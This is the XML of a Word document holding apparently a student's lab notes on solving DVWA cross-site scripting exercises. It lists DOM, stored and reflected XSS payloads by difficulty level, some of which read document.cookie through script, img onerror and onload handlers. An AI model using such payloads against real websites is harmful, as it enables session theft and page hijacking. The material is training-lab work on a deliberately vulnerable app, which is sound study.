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D76A0" w14:textId="14922D26" w:rsidR="006125DD" w:rsidRDefault="006125DD" w:rsidP="006125DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006125DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOM Based Cross Site Scripting (XSS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E517FC" w14:textId="3F30F397" w:rsidR="001D64C9" w:rsidRPr="001D64C9" w:rsidRDefault="001D64C9" w:rsidP="001D64C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D64C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidR="00C327CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300C4B84" w14:textId="510EF34B" w:rsidR="006125DD" w:rsidRDefault="00132C93" w:rsidP="003A3C95">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00E455F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost/DVWA-2.3/vulnerabilities/xss_d/?default=&lt;script&gt;alert('XSS')&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001D64C9" w:rsidRPr="001D64C9">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D73AF0" w14:textId="617A79DF" w:rsidR="00132C93" w:rsidRDefault="00132C93" w:rsidP="00132C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Medium </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F517D2" w14:textId="5173282A" w:rsidR="00132C93" w:rsidRDefault="00132C93" w:rsidP="00132C93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C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?default=&lt;&lt;/select&gt;&lt;img%20src</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00132C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='#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00132C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'%20onclick=alert('Gotcha!!!')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0111234B" w14:textId="3691E0C1" w:rsidR="00132C93" w:rsidRDefault="00132C93" w:rsidP="00132C9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High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5506B006" w14:textId="2E80EE76" w:rsidR="00132C93" w:rsidRDefault="00132C93" w:rsidP="00132C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C93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>default=English&amp;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00132C93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00132C93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ABEBED" w14:textId="77777777" w:rsidR="00514697" w:rsidRDefault="00514697" w:rsidP="00132C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595F67" w14:textId="2CB5D320" w:rsidR="00514697" w:rsidRDefault="00C9535C" w:rsidP="00132C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Pr="00E455F4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https://medium.com/hacker-toolbelt/dvwa-1-9-xss-dom-ae1a29018f66</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1322E816" w14:textId="77777777" w:rsidR="00C9535C" w:rsidRDefault="00C9535C" w:rsidP="00132C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353BE6" w14:textId="77777777" w:rsidR="003A3C95" w:rsidRDefault="003A3C95" w:rsidP="003A3C95">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBD17F5" w14:textId="77777777" w:rsidR="00C9535C" w:rsidRPr="00B03382" w:rsidRDefault="00C9535C" w:rsidP="00C9535C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9535C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability: Stored Cross Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702930BC" w14:textId="38915A8E" w:rsidR="00B03382" w:rsidRPr="00C9535C" w:rsidRDefault="00B03382" w:rsidP="00C9535C">
      <w:r w:rsidRPr="00B03382">
        <w:t>https://github.com/kashrathod19/XSS-DVWA-SOLUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676C260F" w14:textId="55F008F9" w:rsidR="00C9535C" w:rsidRPr="00B03382" w:rsidRDefault="00C9535C" w:rsidP="003A3C95">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03382">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A276E87" w14:textId="271D7ECD" w:rsidR="00C9535C" w:rsidRPr="00B03382" w:rsidRDefault="00C9535C" w:rsidP="003A3C95">
      <w:r w:rsidRPr="00B03382">
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B03382">
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B03382">
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E21337" w14:textId="6BD9A40B" w:rsidR="00C9535C" w:rsidRPr="00B03382" w:rsidRDefault="00B03382" w:rsidP="003A3C95">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03382">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Medium:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B725F" w14:textId="2C4CD551" w:rsidR="00C9535C" w:rsidRPr="00B03382" w:rsidRDefault="00C9535C" w:rsidP="003A3C95">
      <w:r w:rsidRPr="00B03382">
        <w:t xml:space="preserve">Change the input </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B03382">
        <w:t>lenght</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="665FD82E" w14:textId="177734F5" w:rsidR="00287849" w:rsidRPr="00B03382" w:rsidRDefault="00C9535C" w:rsidP="003A3C95">
      <w:r w:rsidRPr="00B03382">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B03382">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B03382">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B03382">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B03382">
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B03382">
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B03382">
        <w:t>=alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B03382">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B03382">
        <w:t>)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8801E5" w14:textId="75BFFE14" w:rsidR="00287849" w:rsidRPr="00B03382" w:rsidRDefault="00287849" w:rsidP="003A3C95">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03382">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>High:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AF7B82" w14:textId="01220532" w:rsidR="00B03382" w:rsidRDefault="00287849" w:rsidP="003A3C95">
      <w:r w:rsidRPr="00B03382">
        <w:t>&lt;body onload=alert('Bugbot19')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E3181E" w14:textId="77777777" w:rsidR="00B03382" w:rsidRDefault="00B03382" w:rsidP="00B03382">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18405E26" w14:textId="77777777" w:rsidR="00B03382" w:rsidRDefault="00B03382" w:rsidP="00B03382">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44825243" w14:textId="54213022" w:rsidR="00B03382" w:rsidRPr="00C9535C" w:rsidRDefault="00B03382" w:rsidP="00B03382">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9535C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reflected Cross Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A9E85" w14:textId="77777777" w:rsidR="00B03382" w:rsidRPr="00B03382" w:rsidRDefault="00B03382" w:rsidP="00B03382">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03382">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SAME FOR THE LOW HIGH MEDIUM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C0276A" w14:textId="77777777" w:rsidR="00B03382" w:rsidRDefault="00B03382" w:rsidP="00B03382">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C9535C">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9535C">
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9535C">
        <w:t xml:space="preserve"> onload=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C9535C">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9535C">
        <w:t>)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651BA1A5" w14:textId="77777777" w:rsidR="00B03382" w:rsidRDefault="00B03382" w:rsidP="00B03382"/>
    <w:p w14:paraId="764536E4" w14:textId="77777777" w:rsidR="00B03382" w:rsidRDefault="00B03382" w:rsidP="00B03382"/>
    <w:p w14:paraId="2A597F96" w14:textId="77777777" w:rsidR="00B03382" w:rsidRDefault="00B03382" w:rsidP="003A3C95"/>
    <w:p w14:paraId="4C429604" w14:textId="53375153" w:rsidR="006125DD" w:rsidRPr="00B03382" w:rsidRDefault="006125DD" w:rsidP="00F76782">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006125DD" w:rsidRPr="00B03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0715E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EC418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F249C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A434C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8319D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1A6BFA4"/>
    <w:lvl w:ilvl="0" w:tplc="ABB6E09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F833F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8D4B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02E5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EEE2D4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F1EB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE54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010582">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1900047281">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="26300077">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1748264150">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="439105981">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="4320186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82"/>
    <w:rsid w:val="00132C93"/>
    <w:rsid w:val="001D64C9"/>
    <w:rsid w:val="002260F9"/>
    <w:rsid w:val="00287849"/>
    <w:rsid w:val="003A3C95"/>
    <w:rsid w:val="00514697"/>
    <w:rsid w:val="006125DD"/>
    <w:rsid w:val="00A76D63"/>
    <w:rsid w:val="00B03382"/>
    <w:rsid w:val="00B60389"/>
    <w:rsid w:val="00C157BB"/>
    <w:rsid w:val="00C327CE"/>
    <w:rsid w:val="00C9535C"/>
    <w:rsid w:val="00D8088A"/>
    <w:rsid w:val="00F7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0281"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DE75845F-EA7D-4124-93BA-7EB63C34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7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2C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C9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C9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2C9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32C93"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00132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6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hacker-toolbelt/dvwa-1-9-xss-dom-ae1a29018f66" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/DVWA-2.3/vulnerabilities/xss_d/?default=%3cscript%3ealert('XSS')%3c/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SP21-BSE-033 (rizwan sabir)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SP21-BSE-033 (rizwan sabir)</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-24T12:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-24T12:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>